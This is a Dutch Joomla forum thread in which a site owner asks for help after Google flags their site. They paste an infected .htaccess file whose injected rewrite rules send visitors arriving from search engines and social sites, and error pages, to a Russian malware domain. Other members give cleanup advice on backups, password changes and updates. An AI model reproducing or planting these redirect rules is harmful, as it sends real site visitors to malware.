Skip to main content

Laatste nieuws

Welkom bij Joomla!NL

Om alle mogelijkheden van dit forum te kunnen gebruiken, moet je je eerst registreren.

Vermeld in iedere vraag duidelijk:
  1. De versie van Joomla! 2.5 die je gebruikt
  2. De volledige url van je website indien mogelijk.
  3. De versie van de extensie waar de vraag over gaat.

google geeft aan dat mijn site gevaarlijk is

google geeft aan dat mijn site gevaarlijk is

05 sep 2012 21:04 - 05 sep 2012 21:55
#1
Hallo

Ik heb een virus gehad op mijn pc, en inmiddels is alles weer opgelost
(wel een goede virusscanner, maar helaas heeft hij deze niet/te laat gezien)
maar nu geeft google aan dat mijn site onveilig is.
Zoals ik het kan zien, (ik heb er niet veel verstand ervan helaas)
is mijn .htaccess bestand aangepast,
Nu kan ik deze gewoon opschonen denk ik, maar volgens mij zijn alle .htaccess bestanden besmet?
onderstaande staat in mijn .htaccess
Code:
<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|infospace)\.(.*) RewriteRule ^(.*)$ http://pluckscom.ru/Tech?8 [R=301,L] RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*) RewriteRule ^(.*)$ http://pluckscom.ru/Tech?8 [R=301,L] </IfModule> ErrorDocument 500 http://pluckscom.ru/Tech?8

Is dit een normale .htaccess ?


Moet ik nu al mijn htacces bestanden aanpassen?
of is hier een tooltje voor?
Edit Astrid: Ik heb de code tussen codetags geplaatst, volgende keer graag zelf doen.
  • lafox
  • lafox's berichtenfoto Heeft onderwerp gestart
  • Joomla!NL ontdekker
  • Joomla!NL ontdekker
  • Berichten: 45

google geeft aan dat mijn site gevaarlijk is

05 sep 2012 21:21
#2
Hallo Lafox,

Het is het meest simpele om een schone recente backup terug te zetten.
Hoop voor je dat je die regelmatig maakt.
  • Otto
  • Otto's Profielfoto
  • Bezoeker
  • Bezoeker

google geeft aan dat mijn site gevaarlijk is

06 sep 2012 07:22
#3
En wellicht FTP wachtwoorden wijzigen enz. Meestal vindt zo'n hack via FTP plaats namelijk.

google geeft aan dat mijn site gevaarlijk is

06 sep 2012 20:59 - 06 sep 2012 21:00
#4

Robby van der Zande schreef : En wellicht FTP wachtwoorden wijzigen enz. Meestal vindt zo'n hack via FTP plaats namelijk.


Oké inmiddels gedaan, bedankt voor de tip.


Otto schreef : Hallo Lafox,

Het is het meest simpele om een schone recente backup terug te zetten.
Hoop voor je dat je die regelmatig maakt.


Ik zal even contact opnemen met mijn domein host, of hij mischien een goede backup heeft voor mij.

Het probleem is nml dat ik de site heb geupdate naar 2.5 en er toen even niks meer mee heb gedaan.
dus ook geen backup programma op heb gezet, ik weet het STOM STOM STOM

Maar als je naar mijn .htaccess kijkt, dan is deze dus niet goed toch?

Alvast bedankt

mvg
Renee
  • lafox
  • lafox's berichtenfoto Heeft onderwerp gestart
  • Joomla!NL ontdekker
  • Joomla!NL ontdekker
  • Berichten: 45

google geeft aan dat mijn site gevaarlijk is

06 sep 2012 21:41
#5
Hallo Renee,

Het klopt idd dat je .htaccess niet goed is. In de meeste gevallen is er echter veel meer aan de hand.
  • Otto
  • Otto's Profielfoto
  • Bezoeker
  • Bezoeker

google geeft aan dat mijn site gevaarlijk is

06 sep 2012 23:05
#6
Download de versie van joomla die je bebruikt en haal daar de htaccess.txt uit.
Upload deze naar je server en hernoem deze naar .htaccess

google geeft aan dat mijn site gevaarlijk is

07 sep 2012 08:38 - 07 sep 2012 08:39
#7

Upload deze naar je server en hernoem deze naar .htaccess


Dit is in 99% van de gevallen niet voldoende omdat er meer dan 1 bestand geïnfecteerd is. Hierdaar zal door de bovenstaande actie het probleem maar tijdelijk opgelost worden.

Het volledige stappenplan bij een infectie is:

1. Zorg ervoor dat je PC volledig malware en virusvrij is.
2. Zet een schone backup terug of controleer je volledige installatie op geïnfecteerde bestanden en verwijder deze.
3. Zodra alles schoon is wijzig je alle wachtwoorden van je host. (database, ftp, etc)
4. Upgrade alles naar de laatste versie
5. maak een nieuwe backup
  • Otto
  • Otto's Profielfoto
  • Bezoeker
  • Bezoeker

google geeft aan dat mijn site gevaarlijk is

07 sep 2012 23:27
#8

Lazy Garfield schreef : Download de versie van joomla die je bebruikt en haal daar de htaccess.txt uit.
Upload deze naar je server en hernoem deze naar .htaccess


Ik heb inmiddels alle .htaccess bestanden verwijdert
de htaccess.txt is wel gewoon goed, en niet aangepast op mijn website
kan ik deze dan gewoon hernoemen?
Google geeft alleen aan dat de .htaccess is aangetast

Otto schreef :

Upload deze naar je server en hernoem deze naar .htaccess


Dit is in 99% van de gevallen niet voldoende omdat er meer dan 1 bestand geïnfecteerd is. Hierdaar zal door de bovenstaande actie het probleem maar tijdelijk opgelost worden.

Het volledige stappenplan bij een infectie is:

1. Zorg ervoor dat je PC volledig malware en virusvrij is.
2. Zet een schone backup terug of controleer je volledige installatie op geïnfecteerde bestanden en verwijder deze.
3. Zodra alles schoon is wijzig je alle wachtwoorden van je host. (database, ftp, etc)
4. Upgrade alles naar de laatste versie
5. maak een nieuwe backup


1. in inmiddels gedaan
2. Ik zal nog even opzoek gaan, maar zoals eerder beschreven heb ik niet echt een actuele backup
3. alles aangepast en wachtwoorden verandert
4. mijn website's zijn volledig up to date (3 stuks alle met hetzelfde probleem)
5. nog niet gedaan.

U geeft aan dat in 99% van de gevallen er meer aan de hand is, hoe kan ik dat controleren?
  • lafox
  • lafox's berichtenfoto Heeft onderwerp gestart
  • Joomla!NL ontdekker
  • Joomla!NL ontdekker
  • Berichten: 45

google geeft aan dat mijn site gevaarlijk is

09 sep 2012 10:14
#9
Dat merk je vanzelf :cheer:
Maar ik kan je nu al met bijna 100% zekerheid zeggen dat die hack in to-time weer terug is. Er staat ergens een script op je server dat dit veroorzaakt namelijk.
Groetjes, Astrid
Gebruik de zoekfunctie van dit forum voordat je een nieuwe vraag plaatst.
Vragen uitsluitend via dit forum.
yndi.nl - kvk 17157725 		Is je vraag beantwoord? Dan kan je het draadje zelf sluiten .
Wil je Joomla!NL steunen? Dat kan met een donatie.
  • Astrid
  • Astrid's Profielfoto
  • Moderator + Technisch team
  • Moderator + Technisch team
  • Berichten: 37447

google geeft aan dat mijn site gevaarlijk is

11 sep 2012 20:13
#10
Ik heb voor zover ik het weet, alles opgeschoond.
Ook de domein host, heeft de site's nagekeken, en goed bevonden
google heeft de waarschuwing ook ingetrokken

Ieder bedankt voor de hulp en tips

mvg
Renee
  • lafox
  • lafox's berichtenfoto Heeft onderwerp gestart
  • Joomla!NL ontdekker
  • Joomla!NL ontdekker
  • Berichten: 45

google geeft aan dat mijn site gevaarlijk is

11 sep 2012 20:15
#11
Hallo,

Fijn dat het opgelost is.
Bedankt voor het terugkoppelen.
Groeten, Jelle
Voordat je een vraag post, gebruik eerst de zoekfunctie van ons forum eens.
Vragen uitsluitend via dit Forum.		Is je vraag opgelost? Dan kan je hem zelf sluiten .
Wil je Joomla!NL steunen? Dat kan met een donatie.
  • Jelle
  • Jelle's Profielfoto
  • Algemeen Moderator
  • Algemeen Moderator
  • Berichten: 13625
Moderators: JelleRomke
Tijd voor maken pagina: 0.781 seconden
Gemaakt door Kunena

Laatste forumberichten

Wil je Joomla!NL steunen?

Steun Joomla!NLAlle teamleden werken enthousiast, op vrijwillige basis, mee aan Joomla!NL. Maar een website met forum kost nu eenmaal geld. Dus als je Joomla!NL wilt steunen, dan kan dat, graag zelfs!

Lees hier meer informatie